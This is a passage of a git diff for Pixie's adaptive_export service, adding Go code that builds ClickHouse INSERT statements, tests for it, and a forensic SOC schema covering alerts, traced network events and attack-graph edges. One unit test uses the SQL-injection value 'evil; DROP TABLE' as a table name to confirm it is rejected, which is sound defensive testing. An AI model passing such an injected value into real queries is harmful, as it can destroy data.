, +// ending in "... VALUES" so a driver's batch API can append rows. +// Column order matches Columns() exactly — callers MUST append values +// in that same order. Dotted ClickHouse identifiers are auto-quoted +// with backticks. +func InsertSQL(table string) (string, error) { + cols, err := Columns(table) + if err != nil { + return "", err + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + return fmt.Sprintf("INSERT INTO forensic_db.%s (%s) VALUES", + identifier, strings.Join(cols, ", ")), nil +} + +// parseColumnList walks the body of a CREATE TABLE statement, returning +// the leading identifier of each non-comment, non-blank line up to the +// closing `)` that ends the column list. Defensive against the SQL +// dialect quirks present in our schema (LowCardinality(...), DEFAULT +// expressions, inline -- comments, multi-word types). +func parseColumnList(ddl string) ([]string, error) { + open := strings.Index(ddl, "(") + if open < 0 { + return nil, fmt.Errorf("malformed DDL: no opening paren") + } + body := ddl[open+1:] + // the closing paren of the column list is the first `)` at the + // matching depth, but our schema doesn't nest parens inside the + // column list except inside DEFAULT exprs (e.g. now64(3)) and + // LowCardinality(String). Track depth. + depth := 1 + end := -1 + for i, r := range body { + switch r { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + end = i + } + } + if end >= 0 { + break + } + } + if end < 0 { + return nil, fmt.Errorf("malformed DDL: no closing paren for column list") + } + body = body[:end] + + var cols []string + for _, raw := range strings.Split(body, "\n") { + line := strings.TrimSpace(raw) + if line == "" || strings.HasPrefix(line, "--") { + continue + } + // strip trailing comma + inline -- comment + if i := strings.Index(line, "--"); i >= 0 { + line = strings.TrimSpace(line[:i]) + } + line = strings.TrimSuffix(line, ",") + if line == "" { + continue + } + // first whitespace-separated token = column name + fields := strings.Fields(line) + if len(fields) == 0 { + continue + } + cols = append(cols, fields[0]) + } + if len(cols) == 0 { + return nil, fmt.Errorf("malformed DDL: no columns parsed") + } + return cols, nil +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go new file mode 100644 index 00000000000..ee66a17a85d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go @@ -0,0 +1,109 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestColumns_AdaptiveAttribution — the operator's only write target. +// Column list must match the DDL exactly so the sink can append values +// in the right positional order. +func TestColumns_AdaptiveAttribution(t *testing.T) { + cols, err := Columns("adaptive_attribution") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + "last_rule_id", "n_anomalies", + } + if len(cols) != len(want) { + t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(cols), len(want), cols) + } + for i, c := range want { + if cols[i] != c { + t.Fatalf("col[%d] = %q, want %q (full=%v)", i, cols[i], c, cols) + } + } +} + +// TestColumns_PixieTablesIncludeNamespaceAndPod — every pixie table's +// column list contains namespace + pod (the JOIN keys against +// adaptive_attribution). +func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, table := range PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + if !contains(cols, "namespace") { + t.Fatalf("%s missing namespace; cols=%v", table, cols) + } + if !contains(cols, "pod") { + t.Fatalf("%s missing pod; cols=%v", table, cols) + } + if contains(cols, "anomaly_hash") || contains(cols, "anomaly_hashes") { + t.Fatalf("%s must not carry hash inline; cols=%v", table, cols) + } + }) + } +} + +// TestInsertSQL_AdaptiveAttribution — the canonical INSERT used by the sink. +func TestInsertSQL_AdaptiveAttribution(t *testing.T) { + sql, err := InsertSQL("adaptive_attribution") + if err != nil { + t.Fatalf("InsertSQL: %v", err) + } + if !strings.HasPrefix(sql, "INSERT INTO forensic_db.adaptive_attribution (") { + t.Fatalf("bad prefix: %q", sql) + } + if !strings.HasSuffix(sql, ") VALUES") { + t.Fatalf("bad suffix: %q", sql) + } +} + +// TestInsertSQL_DottedTablesBacktickQuoted — INSERT statements for +// dotted ClickHouse identifiers must wrap the name in backticks. +func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(table, func(t *testing.T) { + sql, err := InsertSQL(table) + if err != nil { + t.Fatalf("InsertSQL(%q): %v", table, err) + } + if !strings.Contains(sql, "INSERT INTO forensic_db.`"+table+"` (") { + t.Fatalf("dotted table %q not backtick-quoted: %q", table, sql) + } + }) + } +} + +// TestInsertSQL_Unknown — defensive contract. +func TestInsertSQL_Unknown(t *testing.T) { + for _, bad := range []string{"", "evil; DROP TABLE"} { + _, err := InsertSQL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go new file mode 100644 index 00000000000..d0cc78a642e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go @@ -0,0 +1,154 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package clickhouse_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// Live integration tests for the operator's schema-apply path. Driven +// against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if the env var is unset, so `go test` (without -tags +// integration) is unaffected. + +func envEndpoint(t *testing.T) string { + t.Helper() + e := os.Getenv("INTEGRATION_CH_ENDPOINT") + if e == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return e +} + +func envCreds() (string, string) { + return os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func httpExists(t *testing.T, endpoint, user, pass, table string) string { + t.Helper() + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + q := url.Values{} + q.Set("query", fmt.Sprintf("EXISTS forensic_db.%s", ident)) + req, err := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if err != nil { + t.Fatalf("build EXISTS req for %s: %v", table, err) + } + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("EXISTS %s: %v", table, err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + if resp.StatusCode/100 != 2 { + t.Fatalf("EXISTS %s: HTTP %d: %s", table, resp.StatusCode, strings.TrimSpace(string(body))) + } + return strings.TrimSpace(string(body)) +} + +// TestApply_Live runs the operator's Apply() against a live ClickHouse +// and asserts every OperatorOwnedTables entry is materialised. This is +// the regression guard for the "tables never appear in clickhouse" +// class of bug — a green run here proves the embedded schema.sql is +// reachable, the DDL extractor produces valid statements, and the HTTP +// transport posts them successfully. +func TestApply_Live(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply: %v", err) + } + + // Every operator-owned table must EXIST. + for _, table := range chpkg.OperatorOwnedTables { + got := httpExists(t, endpoint, user, pass, table) + if got != "1" { + t.Errorf("table forensic_db.%s: EXISTS=%q, want 1", table, got) + } + } +} + +// TestApply_Idempotent runs Apply() twice and asserts the second pass +// is a no-op (CREATE TABLE IF NOT EXISTS semantics on every statement). +func TestApply_Idempotent(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatal(err) + } + // Separate contexts per Apply — sharing one 60s budget across both + // calls makes Apply #2 occasionally fail with context.DeadlineExceeded + // when the live cluster is slow, masking the idempotency property. + ctx1, cancel1 := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel1() + if err := a.Apply(ctx1); err != nil { + t.Fatalf("Apply #1: %v", err) + } + ctx2, cancel2 := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel2() + if err := a.Apply(ctx2); err != nil { + t.Fatalf("Apply #2 (should be idempotent): %v", err) + } +} + +// TestVerifyPixieSchema_Live runs the post-Apply guard against the +// live cluster. Required pixie columns (namespace, pod, hostname, time_) +// must be present on every pixie observation table. +func TestVerifyPixieSchema_Live(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatal(err) + } + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + // Apply first so the test is order-independent w.r.t. TestApply_Live. + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } + if err := a.VerifyPixieSchema(ctx); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql new file mode 100644 index 00000000000..494285b3d12 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql @@ -0,0 +1,532 @@ +-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2) +-- ---------------------------------------------------------------------- +-- Pixie type map (PixieTypeToClickHouseType): +-- TIME64NS → DateTime64(9), except event_time → DateTime64(3) +-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String +-- BOOLEAN → UInt8 | UINT128 → String +-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3) +-- We add: namespace String, pod String (used by adaptive_attribution JOINs). +-- +-- Engine convention for pixie observation tables: +-- ENGINE = MergeTree() +-- PARTITION BY toYYYYMM(event_time) +-- ORDER BY (hostname, event_time) +-- +-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN +-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_). +-- See the adaptive_attribution definition at the bottom of this file. + +CREATE DATABASE IF NOT EXISTS forensic_db; + +-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged). +CREATE TABLE IF NOT EXISTS forensic_db.alerts ( + timestamp DateTime64(3), + ingest_time DateTime64(3) DEFAULT now64(3), + rule_id LowCardinality(String), + alert_name LowCardinality(String), + severity UInt8, + unique_id String, + cluster_name LowCardinality(String), + namespace LowCardinality(String), + pod_name String, + container_name LowCardinality(String), + container_id String, + workload_name LowCardinality(String), + workload_kind LowCardinality(String), + image LowCardinality(String), + infected_pid UInt32, + process_name LowCardinality(String), + process_cmdline String, + message String, + raw_event String +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(timestamp) + ORDER BY (timestamp, severity, namespace, rule_id) + TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE + SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1; + +-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's +-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards +-- compat with any existing Vector pipeline that already populates it; the +-- operator does not depend on it being non-empty. +CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs ( + BaseRuntimeMetadata String, + CloudMetadata String, + RuleID String, + RuntimeK8sDetails String, + RuntimeProcessDetails String, + event String, + event_time UInt64, + hostname String, + level String DEFAULT '', + message String DEFAULT '', + msg String DEFAULT '', + processtree_depth String DEFAULT '', + anomaly_hash String DEFAULT '' +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(toDateTime(event_time)) + TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- ============================================================================ +-- 12 Pixie socket_tracer tables — strongly predefined, namespace + pod added. +-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate +-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name. +-- ============================================================================ + +-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h +CREATE TABLE IF NOT EXISTS forensic_db.http_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + major_version Int64, + minor_version Int64, + content_type Int64, + req_headers String, + req_method String, + req_path String, + req_body String, + req_body_size Int64, + resp_headers String, + resp_status Int64, + resp_message String, + resp_body String, + resp_body_size Int64, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- http2_messages.beta — http2_messages_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + stream_id Int64, + headers String, + body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- dns_events — dns_table.h +CREATE TABLE IF NOT EXISTS forensic_db.dns_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_header String, + req_body String, + resp_header String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- redis_events — redis_table.h +CREATE TABLE IF NOT EXISTS forensic_db.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mysql_events — mysql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mysql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + req_body String, + resp_status Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- pgsql_events — pgsql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- cql_events — cass_table.h +CREATE TABLE IF NOT EXISTS forensic_db.cql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_op Int64, + req_body String, + resp_op Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mongodb_events — mongodb_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_body String, + resp_status String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- kafka_events.beta — kafka_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + client_id String, + req_body String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- amqp_events — amqp_table.h +CREATE TABLE IF NOT EXISTS forensic_db.amqp_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + frame_type Int64, + channel Int64, + method String, + payload String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mux_events — mux_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mux_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_type Int64, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- tls_events — tls_table.h +CREATE TABLE IF NOT EXISTS forensic_db.tls_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + version Int64, + content_type Int64, + handshake String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- conn_stats — conn_stats_table.h +-- Connection-level statistics (open/close/active counters + bytes_sent/recv + +-- protocol/ssl). Re-added to the rev-2 schema so the +-- adaptive_export retention scripts can persist it. local_addr/local_port are +-- intentionally absent — the pixie kConnStatsElements set carries only +-- remote_addr/remote_port (the connection is identified by the local upid + +-- the remote tuple). Counters are MERGEd by ClickHouse over the (hostname, +-- event_time) order; no aggregating engine because each retention-script +-- pull is a discrete snapshot row. +CREATE TABLE IF NOT EXISTS forensic_db.conn_stats ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + trace_role Int64, + addr_family Int64, + protocol Int64, + ssl UInt8, + conn_open Int64, + conn_close Int64, + conn_active Int64, + bytes_sent Int64, + bytes_recv Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- ============================================================================ +-- adaptive_attribution — operator's only write target in ClickHouse. +-- +-- One row per active anomaly hash per node. The operator inserts one row +-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses +-- re-inserts to the row with the largest t_end — so each fresh anomaly with +-- the same hash extends the active window automatically; stale rows merge +-- away. +-- +-- Analyst joins: +-- +-- SELECT he.*, attr.anomaly_hash +-- FROM forensic_db.http_events he +-- ASOF INNER JOIN forensic_db.adaptive_attribution attr +-- ON he.hostname = attr.hostname +-- AND he.namespace = attr.namespace +-- AND he.pod = attr.pod +-- AND he.time_ >= attr.t_start +-- WHERE he.time_ <= attr.t_end +-- AND attr.anomaly_hash = ''; +-- +-- Boot-time rehydration of the operator's in-memory active set: +-- +-- SELECT * FROM forensic_db.adaptive_attribution FINAL +-- WHERE hostname = '' AND t_end > now64(9); +-- +-- DateTime64(9, 'UTC') — pin tz so bare-string serialization is +-- unambiguous; without it, CH parses incoming timestamps in the +-- server-session timezone and silently shifts values on non-UTC hosts. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution ( + anomaly_hash String, + namespace String, + pod String, + comm String, + pid UInt64, + hostname String, + t_start DateTime64(9, 'UTC'), + t_end DateTime64(9, 'UTC'), + last_seen DateTime64(9, 'UTC'), + last_rule_id String, + n_anomalies UInt64 +) ENGINE = ReplacingMergeTree(t_end) + PARTITION BY toYYYYMM(t_start) + ORDER BY (hostname, anomaly_hash); + +-- ============================================================================ +-- trigger_watermark — persistent cursor for the kubescape_logs trigger. +-- +-- Per node, per source-table. The operator advances the row's `watermark` +-- (UInt64 event_time, ns) every time it successfully drains a batch of +-- kubescape rows. On restart it reads the row back and resumes from there +-- instead of replaying the full table from event_time=0 (which, on a busy +-- cluster, produces multi-GiB single-shot SELECTs that the HTTP client +-- times out on, never advancing → infinite stuck loop). +-- +-- ReplacingMergeTree(updated_at) collapses re-inserts to the newest, so +-- the operator can INSERT cheaply without bothering with UPDATE +-- semantics. Reads use FINAL — cheap because cardinality is one row per +-- (hostname, table_name). +-- +-- This is the operator's second write target alongside adaptive_attribution. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.trigger_watermark ( + hostname String, + table_name String, + watermark UInt64, + updated_at DateTime64(9, 'UTC') +) ENGINE = ReplacingMergeTree(updated_at) + PARTITION BY hostname + ORDER BY (hostname, table_name); + +-- ============================================================================ +-- ae_reconcile — per-pull write-fidelity instrument (gated by ADAPTIVE_RECONCILE). +-- +-- One row per data-plane pull: how many rows AE READ back from Pixie for a +-- (table, pod, window) vs how many it WROTE to ClickHouse. Lets a reconcile +-- run localize any loss to a single hop: +-- read < px-direct PEM count → query/window/filter miss (R5) +-- wrote < read → sink/batch drop (R6) +-- CH distinct > read → re-pull duplication (C8) +-- Plain MergeTree (append-only debug log). NOT a pixie observation table and +-- NOT in PixieTables(); the operator creates it so a reconcile run has a +-- target without manual DDL. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile ( + ts DateTime64(9, 'UTC'), + mode String, + table_name String, + namespace String, + pod String, + win_start DateTime64(9, 'UTC'), + win_end DateTime64(9, 'UTC'), + read_count Int64, + wrote_count Int64, + write_err String, + hostname String +) ENGINE = MergeTree + PARTITION BY toYYYYMMDD(ts) + ORDER BY (table_name, ts) + -- append-only debug log; cap growth so long reconcile runs don't accumulate + -- unbounded storage (CodeRabbit). 30d matches the pixie observation tables. + TTL toDateTime(ts) + INTERVAL 30 DAY DELETE; + +-- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an +-- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie +-- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned +-- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table. +-- +-- event_time (unix NANOSECONDS) + hostname are REQUIRED: Pixie's clickhouse_dsn +-- query template hardcodes `WHERE event_time >= ... AND hostname = ... ORDER BY +-- event_time` — a table without those columns fails with "Unknown identifier +-- event_time". Same convention as kubescape_logs. event_time is nanos, so the +-- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds +-- → year ~58e9 → broken partitions; see the soc#225 fix). +CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph ( + investigation_id String, + event_time UInt64, + hostname String, + requestor_pod String, + responder_pod String, + requestor_service String, + responder_service String, + requestor_ip String, + responder_ip String, + -- Int64/Float64 ONLY for the numeric columns: Pixie's clickhouse_dsn type + -- mapper reads UInt8 as BOOLEAN and does not handle UInt16/UInt32/Float32, + -- so those fail px marshaling with "Column[N] given incorrect type". Int64 + -- + Float64 map cleanly (INT64→Int64, FLOAT64→Float64). event_time stays + -- UInt64 (same as kubescape_logs, which px reads fine). + weight Int64, + max_severity Int64, + confidence Float64, + edge_kind String, + `condition` String, + criteria String, + num_findings Int64 +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time)) + TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- dx_attack_graph_malicious — rule-ins-only view (condition != '') the +-- dx_evidence_graph UI reads by default so benign rows stay in ClickHouse. +CREATE VIEW IF NOT EXISTS forensic_db.dx_attack_graph_malicious AS + SELECT * FROM forensic_db.dx_attack_graph WHERE `condition` != ''; diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel index 4d19f27afab..393e71fe298 100644 --- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel @@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "config", - srcs = [ - "config.go", - "definition.go", - ], + srcs = ["config.go"], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ "//src/utils/shared/k8s", - "//src/vizier/services/adaptive_export/internal/script", "@com_github_sirupsen_logrus//:logrus", - "@in_gopkg_yaml_v2//:yaml_v2", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", "@io_k8s_client_go//kubernetes", "@io_k8s_client_go//rest", diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go deleted file mode 100644 index 2f663ac9422..00000000000 --- a/src/vizier/services/adaptive_export/internal/config/definition.go +++ /dev/null @@ -1,65 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package config - -import ( - "os" - "path/filepath" - "strings" - - "gopkg.in/yaml.v2" - - "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" -) - -const scriptExtension = ".yaml" - -// ReadScriptDefinitions reads the script definition from the given directory path. -// Only .yaml files are read and subdirectories are not traversed. -func ReadScriptDefinitions(dir string) ([]*script.ScriptDefinition, error) { - if _, err := os.Stat(dir); os.IsNotExist(err) { - return nil, nil - } - files, err := os.ReadDir(dir) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, file := range files { - if strings.HasSuffix(file.Name(), scriptExtension) { - description, err := readScriptDefinition(filepath.Join(dir, file.Name())) - if err != nil { - return nil, err - } - l = append(l, description) - } - } - return l, nil -} - -func readScriptDefinition(path string) (*script.ScriptDefinition, error) { - content, err := os.ReadFile(path) - if err != nil { - return nil, err - } - var definition script.ScriptDefinition - err = yaml.Unmarshal(content, &definition) - if err != nil { - return nil, err - } - return &definition, nil -} diff --git a/src/vizier/services/adaptive_export/internal/control/BUILD.bazel b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel new file mode 100644 index 00000000000..c22b1b8ba71 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel @@ -0,0 +1,41 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "control", + srcs = ["server.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/control", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/shared/services/utils", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "control_test", + srcs = ["server_test.go"], + embed = [":control"], + deps = [ + "//src/shared/services/utils", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/control/server.go 